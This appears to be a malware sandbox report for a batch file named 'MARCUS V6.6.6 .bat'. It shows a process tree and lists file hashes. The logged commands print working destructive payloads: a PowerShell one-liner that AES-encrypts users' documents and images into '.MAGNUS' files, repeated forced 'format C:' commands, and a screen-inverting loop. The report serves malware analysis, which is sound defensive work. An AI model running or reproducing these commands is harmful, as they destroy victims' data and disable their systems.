C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "$klucz=New-Object Byte[] 32; (New-Object Security.Cryptography.RNGCryptoServiceProvider).GetBytes($klucz); ls C:\Users -Recurse -Include *.doc,*.xls,*.jpg | % { [IO.File]::WriteAllBytes($_.FullName+'.MAGNUS', (New-Object Security.Cryptography.AesManaged).CreateEncryptor().TransformFinalBlock([IO.File]::ReadAllBytes($_),0,$_.Length) }"2⤵PID:11256
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
PID:3800
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\cdffd5b55a98432da6ea9da6b95c1e9d /t 3912 /p 44361⤵PID:1568
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:472 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff2496dcf8,0x7fff2496dd04,0x7fff2496dd102⤵PID:9072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1960 /prefetch:22⤵PID:9192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1644,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2212 /prefetch:32⤵PID:7724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2436,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2604 /prefetch:82⤵PID:2272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3220 /prefetch:12⤵PID:6048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3844 /prefetch:22⤵PID:4216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4732,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4704 /prefetch:12⤵PID:6812
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:8316
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "1⤵PID:7248
-
C:\Windows\system32\chcp.comchcp 12502⤵PID:8020
-
-
C:\Windows\system32\mode.commode 85,302⤵PID:7200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:7264
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:7596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:7856
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:7792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:7424
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:8176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:7612
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:6304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:8132
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:7288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"2⤵PID:8396
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0aj035jz\0aj035jz.cmdline"3⤵PID:8756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"1⤵PID:8884
-
C:\Windows\system32\chcp.comchcp 12502⤵PID:9032
-
-
C:\Windows\system32\mode.commode 85,302⤵PID:9052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"2⤵PID:9144
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ige4gybm\ige4gybm.cmdline"3⤵PID:9376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"1⤵PID:9324
-
C:\Windows\system32\chcp.comchcp 12502⤵PID:9524
-
-
C:\Windows\system32\mode.commode 85,302⤵PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9668
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:9700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9840
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:9964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10232
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10228
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:9288
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9556
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10196
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4980
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9996
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:9820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9316
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10324
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10312
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10344
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10996
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10616
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10656
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
1KB
MD5b6eced7e034751b1d9b777fe035d709e
SHA13c2c6fba247c46bf791b77fd65ef969c6e53bb17
SHA2561ab911b7a216519871cb3d29e0c2095093c327d02d877651901465b5e1e1d1bb
SHA5123ee4d93dbda0f4dec85a47fccc3bd151f4a412e217bd02476da2600ea220d95e318cd28171067142b307529215e21a326765072ca721ab1d9de23f50c660ae90
-
Filesize
354B
MD520d851a3b613ebaa25df9c0fe3de3221
SHA1950a764ec6f5e3b44a3bcb69cb2b87411f6090f8
SHA256380a1c4ddc2892bf5c70ed4a30377e6a809d47270646cc01e31165a821858b67
SHA5124cfd4d22955fc10b93ff8393c389f0bcd0530194f04e42e9f50de0e962db0b7ac01c919b6780f59e73562e7c11fa9227f245778f33141eb0b4cddfa451fcc30a
-
Filesize
9KB
MD548fd0f8bedd60ef9284c94814a01e2dc
SHA19a3c4af4f01d9d34251fd5c63f4aee11f66200a2
SHA25606c40527501185f8a61d178106fa976293b4fc399968c5eb2581cac874948740
SHA5124838bb28b7d445231f73bef44eead17b5a947fb648e7bbe33f9396dab136d06b7a56bde4e53840dbc50bd9f2283b8b41130d5699839c464ebefba0603c241f9d
-
Filesize
15KB
MD5c0f738fac7f7f4abd16f730c578332f5
SHA19246cfaea53d76cdec1ae191ebff9bef4c6d3812
SHA2560eebff33d23429faeb502b782cee9443f9273e010ce2a2765bec12a057487337
SHA512c3030c7c9ac047334ec379aacbe2fe70db0db625ef6b0026317ef819434c28005b5261c0f1e1a84d8e2754a69e84f052f8dd727a4c2d57b5fe3fabd18c63d913
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD50df6cbc19df40a0361d51146d37fc327
SHA149bb54f43b138f6f0af5d070f09b64e89ef4e59e
SHA2563cd2bef32e1919e9d1767ad1180f73848c928b0ce8345186fbcbdd09ba3bbef1
SHA5127b2f947248025586cb080ff29dca8ce9fd66a058e0a4d0164df148aaffe411f9082f03f69ee9c31558f283830705e3d3e27a27eb7cc0d646fecf40c10fc47d00
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5948d7.TMP
Filesize48B
MD527248b7dc5b56e5d017b565beb089018
SHA1e95d840988bef195b74099cc645119471c85b73c
SHA2565eec9b9ed18b57b102dda84e3f124d71e560839999c70b5279718c517e0838bb
SHA512fb3ac4a407e9ecbaaf838e00b207282fb6a4d0cf9aa10f725b871b5389e2cd7a275bc62cf373cb9fa5e95488e74fc41d9e9070e44d9e05306e4c98f2d917d959
-
Filesize
81KB
MD56af8692b49678d7f8652cc01c9702070
SHA196d02f15b82333f6b2a72eac9a9f1b9be86e9994
SHA2567b5f397f0bc0814e165fb0387b28d462a4564136404b4d09329baa1e576e7b65
SHA512b5b7d0622d91f6eff7daa9eb2f44bc788a6fd17aa20678ed06e1a4d16be6e645c26397dd380c4116e6adbe59a7b3bff0c7b70ec057695c3b3639163245bfb783
-
Filesize
80KB
MD5d20dfd0608a0a5b5253f683a9e44d2f3
SHA12b73357881a7f97b076d2cf63810ccb16302e945
SHA25692656c4743c714ac9ac46a6f08007b125bdd555ef966786765275767fa808789
SHA5126660e02248cc641fa0806d6f3680ea0d1d70e3f3c29d195b4b7b7fadbe343f3398337c76f5b3402b6e33d972c199c5211f6ebf67fd6828cddc48cd21d2813868
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
105KB
MD5d57316a5fdde78663db40c63ffefd92d
SHA1b66c673cc5b7255a1cd96526bf230e1e5cf5b6e2
SHA2568dccfa3be3d3c4e8cdd0c42b6df2663badc6f530531d194aaefd46b6e4dccd5f
SHA512284538dff0d8f3e30a0fa747b644b80309d30eea729b7810ba215f378c816d299c5653e81db324e476794db643c529aa6780d4c1bf303306c6ba67e4b6362ddc
-
Filesize
280B
MD52b5dd617bc51c4c1ccb00b32b7a551cb
SHA17d736ba05663d721e586cb765fdbd30b8c95f5ae
SHA256cace12b31caef21a04e9b72cdaded7f3dab5d6e633385a91bb370c92f8eb1b69
SHA5126892aa73a27cd9b85f3361a933c7e47572df7d13e21ab914b37f715deee1e8d7341f1bcc4a9a17daa1d1fbef44ddfd3bfc0ae2d8d8e3b8802f0dd9ab56bff98b
-
Filesize
280B
MD55a7e1750438748bd333b79a94ca69b2a
SHA194fd1be56969e269ce195ba29c3d464d356d6556
SHA2566d7a64a318c25c643323d5cf1c0c80ccf2f2433e7d74b722fca90468f8f9b914
SHA512842509c0f495ee24d152ab3f7867183d7cd64b01b5a9305405682abbbff3aa18a8ad7d97ee039393fdd1766fc17ad2df1caf711dc4db8dc7b9df608ffc0fdc7e
-
Filesize
280B
MD5eec55fe349980566b1dbf1d409d28c3e
SHA1654ce4b550defea0851f12e8ff81ae9298bb3f60
SHA2562e81ea3d7ddfc0274f3955d5131143c481e63f2529514c5295873b393d508efe
SHA51258e02658d08732b5f36e868331a483b5fde15475a6c5f704a19c97d920399c3f7d41a8fa163c66683bf403598f8f48f0cf9fa468f9783fcabd9136a55cec0059
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize5KB
MD5e3e7dddc4837e1b811b4447f71df51c9
SHA1ce3c479dc8dee85a98b6bf6450ba01ce03ca888a
SHA256e2cfc3fdaa2c4f827d3a1ecb40cd55485fa23ed1b90549fdba37affbf7bc31bc
SHA512d79b1a0dae17af37967fc9af7e69ebfdc72d430db8153f56bc2c6aa92638f5644b37eaa6da345f805a619d30c447addaeef035afc3968e8d8bd26495f0517b35
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5808b5.TMP
Filesize3KB
MD533fc327427c952d608f625b992c9958b
SHA13a59991897e0693be3c14285a77b97a413067616
SHA2563c60e60011d9b3eb200784b7e0bba37da3a7519326261ac7d92da9eac73928f7
SHA512d98267fbb69511a94f4285c3d49745a4ea6cd264934501f1c45b05f510fb0e65abd70d90d3d79bf0038a9ac4ea682e9c39132e6033b5436f5e881d49514849b5
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.91.1_0\_locales\en_US\messages.json
Filesize1KB
MD5578215fbb8c12cb7e6cd73fbd16ec994
SHA19471d71fa6d82ce1863b74e24237ad4fd9477187
SHA256102b586b197ea7d6edfeb874b97f95b05d229ea6a92780ea8544c4ff1e6bc5b1
SHA512e698b1a6a6ed6963182f7d25ac12c6de06c45d14499ddc91e81bdb35474e7ec9071cfebd869b7d129cb2cd127bc1442c75e408e21eb8e5e6906a607a3982b212
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.91.1_0\manifest.json
Filesize2KB
MD5d7f153bc1705e465c201f5ba53bd25ab
SHA1055f9a40028bbf43f9ef36355e41b666d505716e
SHA25615fc4a643e54ecb6b4ccacf11b14b314ccbdd534204bea8a46c5886627d224fa
SHA512b782fe9bd5bfdf9dd63b722aa1a84d14d49116faccda91e38973318e4b958554de891c4404d5d86ac9cf9307ac5e61638080f95a7ebf00ce1c762815b9f04bc1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js
Filesize9KB
MD53d20584f7f6c8eac79e17cca4207fb79
SHA13c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA2560d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59
-
Filesize
108KB
MD506d55006c2dec078a94558b85ae01aef
SHA16a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60
-
Filesize
19KB
MD5f070db5a804f373aa9d6f1236ec3cbc1
SHA1d2813838dee70f980e7620d81fa46473fb1dc081
SHA2566933e83e6c3d4c0d9f8005173241c52a40464762d77227819ab3d55ca19cab9a
SHA5123bb5010145bbf45c64b7ebdf4e1f518d81635a2a4ca150755621e0ecd536495576b9541da6ccbe72bb12043164503040430baceca402403b2ec209fecc0d3671
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
16KB
MD56bbe6caeacc480600e505611a46a57ae
SHA18df9abe4230b4925824521f8e0e06f397c19e4a7
SHA256b28933bb33599c3c32642b9e1e7602ab83d0a12a61cc7ad3923b548031abb8a3
SHA5121b85ec7b5b7d4ff1047f701ca6320c70e205a8b3d4d702060965dfc00b239e3ab9307fed77db4e981ceed123493530292b6a94cc3af8b15d9b088db15a6c25f6
-
Filesize
20KB
MD5b01e53044c1b0fdd1a454c6d6304819e
SHA1b0cc9008f600255f51a126dbab6565d568b7824f
SHA2568e478339a15a35a9990a3a2b68121e35ac9672218c74fd77f37c0089cd43e3e4
SHA512ec1630e5dfbe2b8feef7abd0a4ebb3ec02ae450c1b9a9c649c620aafc7e91c6ef591eba1e3e7a97cd57a7e30e44e55022de9ddc3212bb8738ef46fee134b8120
-
Filesize
36KB
MD59f8678a315350d88f1921e4a5111f13e
SHA14888ccec1413c2472c4cc32000dfd552f0804c61
SHA2561235b8ee5e786c3b87befd25245a293b5731f94961a56ffac3aa6c29c2bb3707
SHA5129e7ba8543070ff962c76fe4d248848b54adb21c31218cc67c6dcb6ba0663d787b74bd0bc07c1589b54df4002d296b2a75ab958d104abc5789b973f888372e9a0
-
Filesize
4KB
MD5577b3782ef96fea6a28d1d04d4c45a8a
SHA1acb2f11697d6ff8f0db3601d5cb37cd8d17b5dd1
SHA256ed46a385fcaa787ae56c51fef627e24eaef4ca5e7ee011ab26dacf7d3222b281
SHA512bb31e1adea442e1696dfdc8023a611535137eed5679dc2438d8219364aa7cd62e13a46a39f4388b7fb78eee36d6fbbe37786f2c6f4c75c8d8c26cc7f6939a88d
-
Filesize
23KB
MD50248afcc4c8e8cc727652e361d024764
SHA1939a03c0f9b8d508b6ec78494d2eb3ed8457e1a4
SHA2567a6cd84fc4c6a87c01f890d9a53ff7f7fa9353ee6eec49067acd82c4386b440e
SHA512f927ca1058c264c5ebbb88f18ca6d79f1b7c19f047fe33eca4e82fe87ab343f0514ab84e4a8fc0cd56df6a4b23d48fe0e1f5072d77d00b063d17dbbc6b1af44b
-
Filesize
876B
MD5cf1f6be125da502d7e2ee8ebf5c5695f
SHA155edf4d375c1a884cb265a006f5777234dc501c4
SHA256be8c14459aac4e4b1fe27ad3a7790c93b84063d1e3bc2677ed4088ac512ef9e8
SHA51241c51e104325fd93628e5862450bbdcab7a3861cae43000adb333ccdaabd74645f46c877f55f9e42a33ca15332baa1590ad853da22e5927b93dee5af2acdd38f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe585b3a.TMP
Filesize467B
MD5a8e7be4bc99956a1e3a02cf0ee2ca69b
SHA1bb29c01101603026dd100fb3b735e72d74dc6b3a
SHA2563e06445cba28a88d04865d0344dd40b5a5a9deefc3c3fbbc5a7bffddc220ffc9
SHA5126859dfebc007c9c019c0d6c8ad81472e2110cd06cdd0cf823d66d2d26e64387bfa51f499a5c9a4066fa5e8e96f2a57e25b93b3ac3411525e5a42d1e0a45022d5
-
Filesize
22KB
MD53bca8411b45106afaa963d562c371631
SHA178857d33a65e7061ca18a3540c304f01e7e85325
SHA2564503345ee70aa9ca0f90012b665743d7c13ec7052e7a943222287973b752b9c7
SHA512a6a7e9af6613a30730a0b87be76f87144a3483afb756445d462de7b22543027e5e8f5822e0337ba2d7b65e413e526da962783d05d226c0d13d113d57d28b56ff
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig~RFe585abd.TMP
Filesize3KB
MD522ed3cc04fcc2e66b81335c4395971fd
SHA112ef48d70ec6f360644d2573dde99756f6ac05fb
SHA25627bffcff6642dfcb87ac33eea61059552bc35ccd3c0d9f4da550398351836df9
SHA5129219928d246a8aa761ee289b0baacc7214b028976b1b890c7f1df38ecac61cb3a90e8af1b3861929155d07af304d58ae8f7304466769669a7cd40c55ae61cf40
-
Filesize
39KB
MD5042ab36124775619b7e5f81190139b97
SHA194a4e0720cbc834667775a6776f0be97bed70783
SHA256527f3b40601503472cc1586bca68296a68644924e6614bf9418b50f0d7409740
SHA512bb88e4bd95c2ba14243a0839167a2a1fba733af8ae424d287d4643bc188b707e5b4f7b3b3506d9311ef26949191ffb9cd66dbe39b91439f82628b33cfd0139f9
-
Filesize
30KB
MD5a022d30ed4d8b87e58aa92e4652ee638
SHA13423a5ed20669bec36d20b472410b0061cea941c
SHA2562ba22e1192431494026626f88951fc98100c4ff561746134b82b69ed1981454a
SHA51225d329b27d26b546ab39218369237475fbed65c37c348216b144ed2d7f7a6280c6acd326c560345cda22a3fe83bb183c9080ff592b91e039c582f6cc946b4a26
-
Filesize
6KB
MD52fbf45f98135be6e393ad17dec464708
SHA16f157e2ea075c94a424c1e927cf93e70045f45c6
SHA256a59f14c9cc883be4f81e1dccf2f0a016fbcbfb74864b2eac6e2048d4f0fbc529
SHA512e3e05d2e9d2988b73a98d813e23f6d19331e41e4c233eb25ff6d77159762df36f9b4a1b244a8538016360e1e8be004d20315f919e0afefa5fa8b2faf17c3f96e
-
Filesize
7KB
MD5c2d5c41ce7ec526dc856e4251dd1e93d
SHA1b731c1cc2d0a7f8d61fc75075d1c666c578a25fe
SHA25635309901475f1f2f5b167911df273331c1f001c407981bd39d4c77824912a10b
SHA512380fd4dbe2c5bf519bff2a3090495b13904725c7a32b7e6699ca55fa88bba7a1ef4fda94f9086de29c7cb1119b094187ff7aa87965d0b23c60650a5ede08519f
-
Filesize
30KB
MD580b19c505c7e5c9cb8db301e09cf286f
SHA142f96f618dc4c5bcdb32170f6f4504c3e50e880e
SHA256e7ca3cd1d8dcf44e61bc87422921c6533457868adb7aa9efc7f9e22ed8b591d2
SHA512c93fbe2fad0a13fa794ecbec6339f1f51ac931e380fb9fd7e6a2acbd9eef53719dad5ad3611bd820596d8540884348a98c56f012948631c5b7fcac8b28dc2737
-
Filesize
30KB
MD5feb25d0151b98fc146e42a92c4a537d6
SHA17451a4b20e33bb5bceee39be997382be23790c0b
SHA256f66b66f9279c8cd0f96ad664d3defe5cd93147ed61d3bf2586915785ec9036fd
SHA51271cdd83058dc580f86bfa190e79e133b0d0eb67635f21a7daf71269418b442e73a6684b8a02bab495e4e91c427ef8804a7688711d418a57b62587406d2d208ae
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD53788b5a0a4969d1b84c367bd6b45c5ea
SHA1050151ef238d8011b8b9b06971fead21df62dfaa
SHA25683016e0b4cc9d49c14700b9b655e25a30afd927f66b10dcc1cf882de7a006667
SHA51239895781f2790a8bd0c8ea827f4affe49caace3991a51fdabce4f2a5b0d8206f1989d22120de33636a6c5f963f78d179abfcb633250a21c31b83b2c7b75f43e6
-
Filesize
1KB
MD575bfef5f222eb8e57b4fc25d599a9b73
SHA1f11e28791ad3ae64a67477363f63b91bb9cdd7a4
SHA256ca02b53396df5810f5d667890181e7d4e434933212c71dd6acf1972f4fba07c6
